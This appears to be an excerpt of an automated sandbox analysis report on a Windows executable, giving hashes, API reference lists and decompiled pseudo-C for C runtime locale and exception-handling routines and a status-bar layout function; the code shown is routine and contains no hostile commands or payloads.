                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712610122.0000000000159000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712714995.000000000015C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713013679.0000000000170000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713099356.0000000000173000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_f0000_fs7AQcREFX.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: lstrcpynlstrlen$MenuString
                                                                                                                                                                                                                                                                                          • String ID: (empty)
                                                                                                                                                                                                                                                                                          • API String ID: 1190328411-3693985619
                                                                                                                                                                                                                                                                                          • Opcode ID: c3a9ab9d2791747b3ac975a086af2defd0bb9e8eb28da833f51e363a41f09f8b
                                                                                                                                                                                                                                                                                          • Instruction ID: 1b89a81ea4516e4147d3af66bc7124405c28d99e2a8177ae94308268968037e0
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c3a9ab9d2791747b3ac975a086af2defd0bb9e8eb28da833f51e363a41f09f8b
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 77F09035B082246BE6691F14FD19EF633BCEB88B00B00052BF651E2880D7F8A8D58A64
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 91%
                                                                                                                                                                                                                                                                                          			E00107440(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                                                                                                                                                                                          				intOrPtr _t26;
                                                                                                                                                                                                                                                                                          				intOrPtr _t30;
                                                                                                                                                                                                                                                                                          				intOrPtr _t39;
                                                                                                                                                                                                                                                                                          				void* _t40;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_t31 = __ebx;
                                                                                                                                                                                                                                                                                          				_push(8);
                                                                                                                                                                                                                                                                                          				_push(0x114530);
                                                                                                                                                                                                                                                                                          				E00108F60(__ebx, __edi, __esi);
                                                                                                                                                                                                                                                                                          				GetModuleHandleW(L"KERNEL32.DLL");
                                                                                                                                                                                                                                                                                          				_t39 =  *((intOrPtr*)(_t40 + 8));
                                                                                                                                                                                                                                                                                          				 *((intOrPtr*)(_t39 + 0x5c)) = 0x1113a0;
                                                                                                                                                                                                                                                                                          				 *(_t39 + 8) =  *(_t39 + 8) & 0x00000000;
                                                                                                                                                                                                                                                                                          				 *((intOrPtr*)(_t39 + 0x14)) = 1;
                                                                                                                                                                                                                                                                                          				 *((intOrPtr*)(_t39 + 0x70)) = 1;
                                                                                                                                                                                                                                                                                          				 *((char*)(_t39 + 0xc8)) = 0x43;
                                                                                                                                                                                                                                                                                          				 *((char*)(_t39 + 0x14b)) = 0x43;
                                                                                                                                                                                                                                                                                          				 *(_t39 + 0x68) = 0x159068;
                                                                                                                                                                                                                                                                                          				E0010A67E(__ebx, 1, 0xd);
                                                                                                                                                                                                                                                                                          				 *(_t40 - 4) =  *(_t40 - 4) & 0x00000000;
                                                                                                                                                                                                                                                                                          				InterlockedIncrement( *(_t39 + 0x68));
                                                                                                                                                                                                                                                                                          				 *(_t40 - 4) = 0xfffffffe;
                                                                                                                                                                                                                                                                                          				E001074E2();
                                                                                                                                                                                                                                                                                          				E0010A67E(_t31, 1, 0xc);
                                                                                                                                                                                                                                                                                          				 *(_t40 - 4) = 1;
                                                                                                                                                                                                                                                                                          				_t26 =  *((intOrPtr*)(_t40 + 0xc));
                                                                                                                                                                                                                                                                                          				 *((intOrPtr*)(_t39 + 0x6c)) = _t26;
                                                                                                                                                                                                                                                                                          				if(_t26 == 0) {
                                                                                                                                                                                                                                                                                          					_t30 =  *0x1597d0; // 0x1596f8
                                                                                                                                                                                                                                                                                          					 *((intOrPtr*)(_t39 + 0x6c)) = _t30;
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				E00107084( *((intOrPtr*)(_t39 + 0x6c)));
                                                                                                                                                                                                                                                                                          				 *(_t40 - 4) = 0xfffffffe;
                                                                                                                                                                                                                                                                                          				return E00108FA5(E001074EB());
                                                                                                                                                                                                                                                                                          			}







                                                                                                                                                                                                                                                                                          0x00107440
                                                                                                                                                                                                                                                                                          0x00107440
                                                                                                                                                                                                                                                                                          0x00107442
                                                                                                                                                                                                                                                                                          0x00107447
                                                                                                                                                                                                                                                                                          0x00107451
                                                                                                                                                                                                                                                                                          0x00107457
                                                                                                                                                                                                                                                                                          0x0010745a
                                                                                                                                                                                                                                                                                          0x00107461
                                                                                                                                                                                                                                                                                          0x00107468
                                                                                                                                                                                                                                                                                          0x0010746b
                                                                                                                                                                                                                                                                                          0x0010746e
                                                                                                                                                                                                                                                                                          0x00107475
                                                                                                                                                                                                                                                                                          0x0010747c
                                                                                                                                                                                                                                                                                          0x00107485
                                                                                                                                                                                                                                                                                          0x0010748b
                                                                                                                                                                                                                                                                                          0x00107492
                                                                                                                                                                                                                                                                                          0x00107498
                                                                                                                                                                                                                                                                                          0x0010749f
                                                                                                                                                                                                                                                                                          0x001074a6
                                                                                                                                                                                                                                                                                          0x001074ac
                                                                                                                                                                                                                                                                                          0x001074af
                                                                                                                                                                                                                                                                                          0x001074b2
                                                                                                                                                                                                                                                                                          0x001074b7
                                                                                                                                                                                                                                                                                          0x001074b9
                                                                                                                                                                                                                                                                                          0x001074be
                                                                                                                                                                                                                                                                                          0x001074be
                                                                                                                                                                                                                                                                                          0x001074c4
                                                                                                                                                                                                                                                                                          0x001074ca
                                                                                                                                                                                                                                                                                          0x001074db

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(KERNEL32.DLL,00114530,00000008,00107548,00000000,00000000,?,?,00107A12,001063ED,?,?,?,000F1339,80070057), ref: 00107451
                                                                                                                                                                                                                                                                                          • __lock.LIBCMT ref: 00107485
                                                                                                                                                                                                                                                                                            • Part of subcall function 0010A67E: __mtinitlocknum.LIBCMT ref: 0010A694
                                                                                                                                                                                                                                                                                            • Part of subcall function 0010A67E: __amsg_exit.LIBCMT ref: 0010A6A0
                                                                                                                                                                                                                                                                                            • Part of subcall function 0010A67E: EnterCriticalSection.KERNEL32(00000000,00000000,?,0010748A,0000000D), ref: 0010A6A8
                                                                                                                                                                                                                                                                                          • InterlockedIncrement.KERNEL32(?), ref: 00107492
                                                                                                                                                                                                                                                                                          • __lock.LIBCMT ref: 001074A6
                                                                                                                                                                                                                                                                                          • ___addlocaleref.LIBCMT ref: 001074C4
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.711567392.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.711475414.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712610122.0000000000159000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712714995.000000000015C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713013679.0000000000170000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713099356.0000000000173000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_f0000_fs7AQcREFX.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit__mtinitlocknum
                                                                                                                                                                                                                                                                                          • String ID: KERNEL32.DLL
                                                                                                                                                                                                                                                                                          • API String ID: 637971194-2576044830
                                                                                                                                                                                                                                                                                          • Opcode ID: 31b93777c10d3d31d6372665afaf590da96205dd1965d4a03da5fea0c6471bd4
                                                                                                                                                                                                                                                                                          • Instruction ID: daae29d91010ede7785dd519ee0a24453627dd68ed23bc987ba1cf5cb864db85
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 31b93777c10d3d31d6372665afaf590da96205dd1965d4a03da5fea0c6471bd4
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E2015BB1848B00EBD760AF75D905789FBE0BF64321F20894AE4D5966E1CBF4A684CB11
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 70%
                                                                                                                                                                                                                                                                                          			E0010E34F(void* __edx, void* __edi, void* __esi, intOrPtr* _a4) {
                                                                                                                                                                                                                                                                                          				signed int _v8;
                                                                                                                                                                                                                                                                                          				void* __ebp;
                                                                                                                                                                                                                                                                                          				void* _t16;
                                                                                                                                                                                                                                                                                          				intOrPtr* _t19;
                                                                                                                                                                                                                                                                                          				void* _t23;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_t26 = __esi;
                                                                                                                                                                                                                                                                                          				_t25 = __edi;
                                                                                                                                                                                                                                                                                          				_t24 = __edx;
                                                                                                                                                                                                                                                                                          				_t31 =  *((intOrPtr*)( *_a4)) - 0xe0434352;
                                                                                                                                                                                                                                                                                          				if( *((intOrPtr*)( *_a4)) == 0xe0434352) {
                                                                                                                                                                                                                                                                                          					L8:
                                                                                                                                                                                                                                                                                          					__eflags =  *((intOrPtr*)(E0010756D(_t23, _t24, __eflags) + 0x90));
                                                                                                                                                                                                                                                                                          					if(__eflags > 0) {
                                                                                                                                                                                                                                                                                          						_t16 = E0010756D(_t23, _t24, __eflags);
                                                                                                                                                                                                                                                                                          						_t9 = _t16 + 0x90;
                                                                                                                                                                                                                                                                                          						 *_t9 =  *((intOrPtr*)(_t16 + 0x90)) - 1;
                                                                                                                                                                                                                                                                                          						__eflags =  *_t9;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					goto L10;
                                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                                          					__eflags = __eax - 0xe0434f4d;
                                                                                                                                                                                                                                                                                          					if(__eflags == 0) {
                                                                                                                                                                                                                                                                                          						goto L8;
                                                                                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                                                                                          						__eflags = __eax - 0xe06d7363;
                                                                                                                                                                                                                                                                                          						if(__eflags != 0) {
                                                                                                                                                                                                                                                                                          							L10:
                                                                                                                                                                                                                                                                                          							__eflags = 0;
                                                                                                                                                                                                                                                                                          							return 0;
                                                                                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                                                                                          							 *(E0010756D(__ebx, __edx, __eflags) + 0x90) =  *(__eax + 0x90) & 0x00000000;
                                                                                                                                                                                                                                                                                          							_push(8);
                                                                                                                                                                                                                                                                                          							_push(0x1145a0);
                                                                                                                                                                                                                                                                                          							E00108F60(_t23, __edi, __esi);
                                                                                                                                                                                                                                                                                          							_t19 =  *((intOrPtr*)(E0010756D(_t23, __edx, _t31) + 0x78));
                                                                                                                                                                                                                                                                                          							if(_t19 != 0) {
                                                                                                                                                                                                                                                                                          								_v8 = _v8 & 0x00000000;
                                                                                                                                                                                                                                                                                          								 *_t19();
                                                                                                                                                                                                                                                                                          								_v8 = 0xfffffffe;
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          							return E00108FA5(E00109458(_t23, _t24, _t25, _t26));
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          			}








                                                                                                                                                                                                                                                                                          0x0010e34f
                                                                                                                                                                                                                                                                                          0x0010e34f
                                                                                                                                                                                                                                                                                          0x0010e34f
                                                                                                                                                                                                                                                                                          0x0010e35b
                                                                                                                                                                                                                                                                                          0x0010e360
                                                                                                                                                                                                                                                                                          0x0010e381
                                                                                                                                                                                                                                                                                          0x0010e386
                                                                                                                                                                                                                                                                                          0x0010e38d
                                                                                                                                                                                                                                                                                          0x0010e38f
                                                                                                                                                                                                                                                                                          0x0010e394
                                                                                                                                                                                                                                                                                          0x0010e394
                                                                                                                                                                                                                                                                                          0x0010e394
                                                                                                                                                                                                                                                                                          0x0010e394
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x0010e362
                                                                                                                                                                                                                                                                                          0x0010e362
                                                                                                                                                                                                                                                                                          0x0010e367
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x0010e369
                                                                                                                                                                                                                                                                                          0x0010e369
                                                                                                                                                                                                                                                                                          0x0010e36e
                                                                                                                                                                                                                                                                                          0x0010e39a
                                                                                                                                                                                                                                                                                          0x0010e39a
                                                                                                                                                                                                                                                                                          0x0010e39d
                                                                                                                                                                                                                                                                                          0x0010e370
                                                                                                                                                                                                                                                                                          0x0010e375
                                                                                                                                                                                                                                                                                          0x00108ec4
                                                                                                                                                                                                                                                                                          0x00108ec6
                                                                                                                                                                                                                                                                                          0x00108ecb
                                                                                                                                                                                                                                                                                          0x00108ed5
                                                                                                                                                                                                                                                                                          0x00108eda
                                                                                                                                                                                                                                                                                          0x00108edc
                                                                                                                                                                                                                                                                                          0x00108ee0
                                                                                                                                                                                                                                                                                          0x00108eeb
                                                                                                                                                                                                                                                                                          0x00108eeb
                                                                                                                                                                                                                                                                                          0x00108efc
                                                                                                                                                                                                                                                                                          0x00108efc
                                                                                                                                                                                                                                                                                          0x0010e36e
                                                                                                                                                                                                                                                                                          0x0010e367

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • __getptd.LIBCMT ref: 0010E370
                                                                                                                                                                                                                                                                                            • Part of subcall function 0010756D: __getptd_noexit.LIBCMT ref: 00107570
                                                                                                                                                                                                                                                                                            • Part of subcall function 0010756D: __amsg_exit.LIBCMT ref: 0010757D
                                                                                                                                                                                                                                                                                          • __getptd.LIBCMT ref: 0010E381
                                                                                                                                                                                                                                                                                          • __getptd.LIBCMT ref: 0010E38F
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.711567392.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.711475414.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712610122.0000000000159000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712714995.000000000015C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713013679.0000000000170000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713099356.0000000000173000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_f0000_fs7AQcREFX.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: __getptd$__amsg_exit__getptd_noexit
                                                                                                                                                                                                                                                                                          • String ID: MOC$RCC$csm
                                                                                                                                                                                                                                                                                          • API String ID: 803148776-2671469338
                                                                                                                                                                                                                                                                                          • Opcode ID: 2bb8a019e40008f98128019de2652a676d431d22a54ffe0d566d161f219412f7
                                                                                                                                                                                                                                                                                          • Instruction ID: 52aab06e771e6a18f9da802b02f2ee0c03a083f587c0bf9f66e4aa52885bd0d8
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2bb8a019e40008f98128019de2652a676d431d22a54ffe0d566d161f219412f7
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 55E01234A04304CFCB20E766D54A7A83BE4BB58314F5619A1E48CCF2E2C7B4E8504942
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 79%
                                                                                                                                                                                                                                                                                          			E00100680(void* __ecx, struct HWND__* __edx) {
                                                                                                                                                                                                                                                                                          				long _v8;
                                                                                                                                                                                                                                                                                          				char _v16;
                                                                                                                                                                                                                                                                                          				signed int _v20;
                                                                                                                                                                                                                                                                                          				struct tagRECT _v36;
                                                                                                                                                                                                                                                                                          				char _v548;
                                                                                                                                                                                                                                                                                          				long _v552;
                                                                                                                                                                                                                                                                                          				void* __ebx;
                                                                                                                                                                                                                                                                                          				void* __edi;
                                                                                                                                                                                                                                                                                          				void* __esi;
                                                                                                                                                                                                                                                                                          				signed int _t55;
                                                                                                                                                                                                                                                                                          				signed int _t56;
                                                                                                                                                                                                                                                                                          				signed int _t58;
                                                                                                                                                                                                                                                                                          				void* _t60;
                                                                                                                                                                                                                                                                                          				long _t63;
                                                                                                                                                                                                                                                                                          				signed int _t67;
                                                                                                                                                                                                                                                                                          				signed int _t68;
                                                                                                                                                                                                                                                                                          				long _t72;
                                                                                                                                                                                                                                                                                          				int _t76;
                                                                                                                                                                                                                                                                                          				signed int _t84;
                                                                                                                                                                                                                                                                                          				void* _t85;
                                                                                                                                                                                                                                                                                          				signed int _t91;
                                                                                                                                                                                                                                                                                          				intOrPtr _t97;
                                                                                                                                                                                                                                                                                          				void* _t103;
                                                                                                                                                                                                                                                                                          				long _t104;
                                                                                                                                                                                                                                                                                          				void* _t105;
                                                                                                                                                                                                                                                                                          				void* _t107;
                                                                                                                                                                                                                                                                                          				long _t108;
                                                                                                                                                                                                                                                                                          				void* _t109;
                                                                                                                                                                                                                                                                                          				signed int _t110;
                                                                                                                                                                                                                                                                                          				char* _t117;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_t100 = __edx;
                                                                                                                                                                                                                                                                                          				_push(0xffffffff);
                                                                                                                                                                                                                                                                                          				_push(E0010F43B);
                                                                                                                                                                                                                                                                                          				_push( *[fs:0x0]);
                                                                                                                                                                                                                                                                                          				_t55 =  *0x159060; // 0x1f9a9bdf
                                                                                                                                                                                                                                                                                          				_t56 = _t55 ^ _t110;
                                                                                                                                                                                                                                                                                          				_v20 = _t56;
                                                                                                                                                                                                                                                                                          				_push(_t103);
                                                                                                                                                                                                                                                                                          				_push(_t56);
                                                                                                                                                                                                                                                                                          				 *[fs:0x0] =  &_v16;
                                                                                                                                                                                                                                                                                          				_t107 = __ecx;
                                                                                                                                                                                                                                                                                          				_v552 = 0;
                                                                                                                                                                                                                                                                                          				_v8 = 0;
                                                                                                                                                                                                                                                                                          				_t58 =  *(__ecx + 0x24);
                                                                                                                                                                                                                                                                                          				_t60 = _t58 + _t58 + _t58 + _t58;
                                                                                                                                                                                                                                                                                          				if((0 << 0x00000020 | _t58) << 2 > 0 || _t60 > 0xffffffff) {
                                                                                                                                                                                                                                                                                          					_push(0x80070216);
                                                                                                                                                                                                                                                                                          					_t60 = E000F1170(_t100);
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				_t115 = _t60 - 0x200;
                                                                                                                                                                                                                                                                                          				if(_t60 <= 0x200) {
                                                                                                                                                                                                                                                                                          					_t104 =  &_v548;
                                                                                                                                                                                                                                                                                          					_v552 = _t104;
                                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                                          					E000FFF60(_t60, _t100, _t103, _t107, _t115,  &_v552);
                                                                                                                                                                                                                                                                                          					_t104 = _v552;
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				if(_t104 != 0) {
                                                                                                                                                                                                                                                                                          					_t63 = SendMessageA( *(_t107 + 4), 0x406,  *(_t107 + 0x24), _t104);
                                                                                                                                                                                                                                                                                          					__eflags = _t63 -  *(_t107 + 0x24);
                                                                                                                                                                                                                                                                                          					if(_t63 ==  *(_t107 + 0x24)) {
                                                                                                                                                                                                                                                                                          						_v36.top = 0;
                                                                                                                                                                                                                                                                                          						_v36.right = 0;
                                                                                                                                                                                                                                                                                          						_v36.bottom = 0;
                                                                                                                                                                                                                                                                                          						_v36.left = 0;
                                                                                                                                                                                                                                                                                          						GetClientRect( *(_t107 + 4),  &_v36);
                                                                                                                                                                                                                                                                                          						_t100 =  *(_t107 + 4);
                                                                                                                                                                                                                                                                                          						_t84 = _v36.right -  *((intOrPtr*)(_t104 +  *(_t107 + 0x24) * 4 - 4));
                                                                                                                                                                                                                                                                                          						_t67 = GetWindowLongA( *(_t107 + 4), 0xfffffff0);
                                                                                                                                                                                                                                                                                          						__eflags = _t67 & 0x00000100;
                                                                                                                                                                                                                                                                                          						if((_t67 & 0x00000100) != 0) {
                                                                                                                                                                                                                                                                                          							_t76 = GetSystemMetrics(2);
                                                                                                                                                                                                                                                                                          							_t84 = _t84 - _t76 - GetSystemMetrics(0x2d);
                                                                                                                                                                                                                                                                                          							__eflags = _t84;
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						_t91 =  *(_t107 + 0x24);
                                                                                                                                                                                                                                                                                          						_t68 = 0;
                                                                                                                                                                                                                                                                                          						__eflags = _t91;
                                                                                                                                                                                                                                                                                          						if(_t91 > 0) {
                                                                                                                                                                                                                                                                                          							_t100 =  *(_t107 + 0x28);
                                                                                                                                                                                                                                                                                          							while(1) {
                                                                                                                                                                                                                                                                                          								__eflags = _t100->i;
                                                                                                                                                                                                                                                                                          								if(_t100->i == 0) {
                                                                                                                                                                                                                                                                                          									goto L19;
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          								_t68 = _t68 + 1;
                                                                                                                                                                                                                                                                                          								_t100 = _t100 + 4;
                                                                                                                                                                                                                                                                                          								__eflags = _t68 - _t91;
                                                                                                                                                                                                                                                                                          								if(_t68 < _t91) {
                                                                                                                                                                                                                                                                                          									continue;
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          								goto L19;
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						L19:
                                                                                                                                                                                                                                                                                          						__eflags = _t68 - _t91;
                                                                                                                                                                                                                                                                                          						if(_t68 < _t91) {
                                                                                                                                                                                                                                                                                          							__eflags = _t68;
                                                                                                                                                                                                                                                                                          							if(_t68 != 0) {
                                                                                                                                                                                                                                                                                          								_t97 =  *((intOrPtr*)(_t104 + _t68 * 4 - 4));
                                                                                                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                                                                                                          								_t97 = 0;
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          							_t100 =  *((intOrPtr*)(_t104 + _t68 * 4)) + _t84;
                                                                                                                                                                                                                                                                                          							__eflags =  *((intOrPtr*)(_t104 + _t68 * 4)) + _t84 - _t97;
                                                                                                                                                                                                                                                                                          							if( *((intOrPtr*)(_t104 + _t68 * 4)) + _t84 > _t97) {
                                                                                                                                                                                                                                                                                          								do {
                                                                                                                                                                                                                                                                                          									 *((intOrPtr*)(_t104 + _t68 * 4)) =  *((intOrPtr*)(_t104 + _t68 * 4)) + _t84;
                                                                                                                                                                                                                                                                                          									_t68 = _t68 + 1;
                                                                                                                                                                                                                                                                                          									__eflags = _t68 -  *(_t107 + 0x24);
                                                                                                                                                                                                                                                                                          								} while (_t68 <  *(_t107 + 0x24));
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						_t108 = SendMessageA( *(_t107 + 4), 0x404,  *(_t107 + 0x24), _t104);
                                                                                                                                                                                                                                                                                          						__eflags = _v552 -  &_v548;
                                                                                                                                                                                                                                                                                          						if(_v552 !=  &_v548) {
                                                                                                                                                                                                                                                                                          							E000FD040( &_v552);
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						_t72 = _t108;
                                                                                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                                                                                          						__eflags = _v552 -  &_v548;
                                                                                                                                                                                                                                                                                          						goto L8;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                                          					_t100 =  &_v548;
                                                                                                                                                                                                                                                                                          					_t117 =  &_v548;
                                                                                                                                                                                                                                                                                          					L8:
                                                                                                                                                                                                                                                                                          					if(_t117 != 0) {
                                                                                                                                                                                                                                                                                          						E000FD040( &_v552);
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					_t72 = 0;
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				 *[fs:0x0] = _v16;
                                                                                                                                                                                                                                                                                          				_pop(_t105);
                                                                                                                                                                                                                                                                                          				_pop(_t109);
                                                                                                                                                                                                                                                                                          				_pop(_t85);
                                                                                                                                                                                                                                                                                          				return E001059E6(_t72, _t85, _v20 ^ _t110, _t100, _t105, _t109);
                                                                                                                                                                                                                                                                                          			}

































                                                                                                                                                                                                                                                                                          0x00100680
                                                                                                                                                                                                                                                                                          0x00100683
                                                                                                                                                                                                                                                                                          0x00100685
                                                                                                                                                                                                                                                                                          0x00100690
                                                                                                                                                                                                                                                                                          0x00100697
                                                                                                                                                                                                                                                                                          0x0010069c
                                                                                                                                                                                                                                                                                          0x0010069e
                                                                                                                                                                                                                                                                                          0x001006a3
                                                                                                                                                                                                                                                                                          0x001006a4
                                                                                                                                                                                                                                                                                          0x001006a8
                                                                                                                                                                                                                                                                                          0x001006b0
                                                                                                                                                                                                                                                                                          0x001006b2
                                                                                                                                                                                                                                                                                          0x001006b8
                                                                                                                                                                                                                                                                                          0x001006bb
                                                                                                                                                                                                                                                                                          0x001006c6
                                                                                                                                                                                                                                                                                          0x001006ca
                                                                                                                                                                                                                                                                                          0x001006d1
                                                                                                                                                                                                                                                                                          0x001006d6
                                                                                                                                                                                                                                                                                          0x001006d6
                                                                                                                                                                                                                                                                                          0x001006db
                                                                                                                                                                                                                                                                                          0x001006e0
                                                                                                                                                                                                                                                                                          0x001006f6
                                                                                                                                                                                                                                                                                          0x001006fc
                                                                                                                                                                                                                                                                                          0x001006e2
                                                                                                                                                                                                                                                                                          0x001006e9
                                                                                                                                                                                                                                                                                          0x001006ee
                                                                                                                                                                                                                                                                                          0x001006ee
                                                                                                                                                                                                                                                                                          0x00100704
                                                                                                                                                                                                                                                                                          0x00100730
                                                                                                                                                                                                                                                                                          0x00100736
                                                                                                                                                                                                                                                                                          0x00100739
                                                                                                                                                                                                                                                                                          0x0010074e
                                                                                                                                                                                                                                                                                          0x00100751
                                                                                                                                                                                                                                                                                          0x00100754
                                                                                                                                                                                                                                                                                          0x0010075c
                                                                                                                                                                                                                                                                                          0x0010075f
                                                                                                                                                                                                                                                                                          0x00100765
                                                                                                                                                                                                                                                                                          0x0010076e
                                                                                                                                                                                                                                                                                          0x00100775
                                                                                                                                                                                                                                                                                          0x0010077b
                                                                                                                                                                                                                                                                                          0x00100780
                                                                                                                                                                                                                                                                                          0x00100784
                                                                                                                                                                                                                                                                                          0x00100794
                                                                                                                                                                                                                                                                                          0x00100794
                                                                                                                                                                                                                                                                                          0x00100794
                                                                                                                                                                                                                                                                                          0x00100796
                                                                                                                                                                                                                                                                                          0x00100799
                                                                                                                                                                                                                                                                                          0x0010079b
                                                                                                                                                                                                                                                                                          0x0010079d
                                                                                                                                                                                                                                                                                          0x0010079f
                                                                                                                                                                                                                                                                                          0x001007a2
                                                                                                                                                                                                                                                                                          0x001007a2
                                                                                                                                                                                                                                                                                          0x001007a5
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x001007a7
                                                                                                                                                                                                                                                                                          0x001007a8
                                                                                                                                                                                                                                                                                          0x001007ab
                                                                                                                                                                                                                                                                                          0x001007ad
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x001007ad
                                                                                                                                                                                                                                                                                          0x001007a2
                                                                                                                                                                                                                                                                                          0x001007af
                                                                                                                                                                                                                                                                                          0x001007af
                                                                                                                                                                                                                                                                                          0x001007b1
                                                                                                                                                                                                                                                                                          0x001007b3
                                                                                                                                                                                                                                                                                          0x001007b5
